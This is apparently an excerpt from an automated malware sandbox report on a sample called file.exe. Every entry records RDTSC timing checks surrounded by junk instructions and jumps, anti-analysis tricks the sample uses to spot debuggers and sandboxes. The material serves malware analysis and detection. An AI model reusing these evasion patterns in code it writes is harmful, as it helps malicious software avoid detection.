                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C812F second address: 10C8133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C83E9 second address: 10C83F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99A452D6C6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C83F3 second address: 10C8410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A4D68173h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8410 second address: 10C841A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091EDE second address: 1091EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C91CE second address: 10C91E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99A452D6C6h 0x0000000a pop edi 0x0000000b jo 00007F99A452D6D2h 0x00000011 jnc 00007F99A452D6C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C91E7 second address: 10C91EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C93A5 second address: 10C93C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C93C2 second address: 10C93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C93C6 second address: 10C93EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F99A452D6CDh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F99A452D6C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C93EA second address: 10C93EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C93EE second address: 10C9415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D2h 0x00000007 je 00007F99A452D6C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F99A452D6C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9549 second address: 10C955F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A4D68172h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C955F second address: 10C9592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99A452D6CCh 0x00000012 jmp 00007F99A452D6CFh 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9592 second address: 10C95AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Bh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C95AB second address: 10C95AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C95AF second address: 10C95CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68177h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C95CC second address: 10C95D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C95D1 second address: 10C95E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F99A4D6816Bh 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C975B second address: 10C9764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9764 second address: 10C9788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F99A4D68178h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9AC7 second address: 10C9ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9ACB second address: 10C9AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCC51 second address: 10CCCC3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F99A452D6D9h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F99A452D6CBh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b pushad 0x0000001c jbe 00007F99A452D6C6h 0x00000022 push esi 0x00000023 pop esi 0x00000024 popad 0x00000025 jbe 00007F99A452D6DBh 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F99A452D6D3h 0x00000035 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCCC3 second address: 10CCCE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCCE2 second address: 10CCCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB539 second address: 10CB53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB53D second address: 10CB55C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F99A452D6C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jo 00007F99A452D6CCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB55C second address: 10CB565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCEA6 second address: 10CCEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCEAA second address: 10CCEBD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F99A4D68166h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D17D9 second address: 10D17DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D17DD second address: 10D17E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D17E1 second address: 10D1804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99A452D6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F99A452D6CEh 0x00000012 jbe 00007F99A452D6C6h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CE9A second address: 108CED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F99A4D6817Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99A4D68174h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CED0 second address: 108CED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2D1D second address: 10D2D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2D21 second address: 10D2D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2D25 second address: 10D2D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99A4D68166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2D31 second address: 10D2D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2D38 second address: 10D2D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F99A4D68166h 0x0000000a popad 0x0000000b jmp 00007F99A4D6816Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007F99A4D68194h 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F99A4D68172h 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6AE6 second address: 10D6AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6853 second address: 10D6859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6859 second address: 10D685E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D69A6 second address: 10D69AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D69AA second address: 10D69AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7D77 second address: 10D7D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7D7B second address: 10D7D85 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7D85 second address: 10D7D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7D8A second address: 10D7DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99A452D6C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F99A452D6CCh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 push edx 0x00000019 jns 00007F99A452D6C6h 0x0000001f pop edx 0x00000020 pushad 0x00000021 jno 00007F99A452D6C6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7DBA second address: 10D7DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A4D68178h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7DDC second address: 10D7DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7DE2 second address: 10D7DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7DE6 second address: 10D7DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D834E second address: 10D8358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F99A4D68166h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8C15 second address: 10D8C38 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A452D6CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F99A452D6CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E94 second address: 10D8E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8F54 second address: 10D8F5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9EB9 second address: 10D9F00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F99A4D68168h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D2121h] 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push edx 0x00000036 pop edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9F00 second address: 10D9F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F99A452D6C6h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC1BF second address: 10DC1ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F99A4D6816Dh 0x00000012 pop edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCFED second address: 10DCFF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCFF3 second address: 10DCFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCFF9 second address: 10DD06C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov si, dx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F99A452D6C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D33DFh], esi 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov edi, edx 0x00000037 jl 00007F99A452D6CCh 0x0000003d popad 0x0000003e xchg eax, ebx 0x0000003f jg 00007F99A452D6CAh 0x00000045 push esi 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 pop esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007F99A452D6DAh 0x00000052 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFABC second address: 10DFAC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DD7EC second address: 10DD7F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DF846 second address: 10DF84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFAC0 second address: 10DFAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFAC6 second address: 10DFAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F99A4D68166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFAD1 second address: 10DFB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F99A452D6C8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 pushad 0x00000027 mov dword ptr [ebp+1245B486h], edi 0x0000002d stc 0x0000002e popad 0x0000002f push 00000000h 0x00000031 clc 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 jmp 00007F99A452D6CCh 0x0000003a jl 00007F99A452D6C6h 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 push edx 0x00000044 pop edx 0x00000045 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E28EF second address: 10E28F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E880 second address: 108E884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E884 second address: 108E89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F99A4D68172h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E30D0 second address: 10E30D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6529 second address: 10E652F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E652F second address: 10E6533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6533 second address: 10E658A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F99A4D6816Bh 0x00000010 pop ecx 0x00000011 jo 00007F99A4D6816Ch 0x00000017 jl 00007F99A4D68166h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F99A4D68168h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+1245CE6Ch], esi 0x00000041 push 00000000h 0x00000043 mov edi, 5A1F1CF1h 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E75A1 second address: 10E75B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E75B4 second address: 10E75B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E94D2 second address: 10E94D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E94D7 second address: 10E94FD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99A4D68168h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add dword ptr [ebp+122D3221h], ebx 0x00000015 push 00000000h 0x00000017 mov edi, 362A08F6h 0x0000001c push 00000000h 0x0000001e mov bh, 0Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA4FC second address: 10EA50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F99A452D6C6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA50F second address: 10EA515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9646 second address: 10E9651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F99A452D6C6h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECEC0 second address: 10ECF50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 je 00007F99A4D68166h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D338Eh], edi 0x00000015 sub di, EA62h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F99A4D68168h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b mov bl, 3Fh 0x0000003d mov dword ptr [ebp+124811F0h], eax 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a push edx 0x0000004b mov di, 7421h 0x0000004f pop ebx 0x00000050 mov eax, dword ptr [ebp+122D0325h] 0x00000056 pushad 0x00000057 mov dx, bx 0x0000005a call 00007F99A4D6816Bh 0x0000005f push esi 0x00000060 pop eax 0x00000061 pop eax 0x00000062 popad 0x00000063 push FFFFFFFFh 0x00000065 push ebx 0x00000066 mov dword ptr [ebp+122D1F97h], edx 0x0000006c pop edi 0x0000006d push eax 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F99A4D68177h 0x00000076 rdtsc
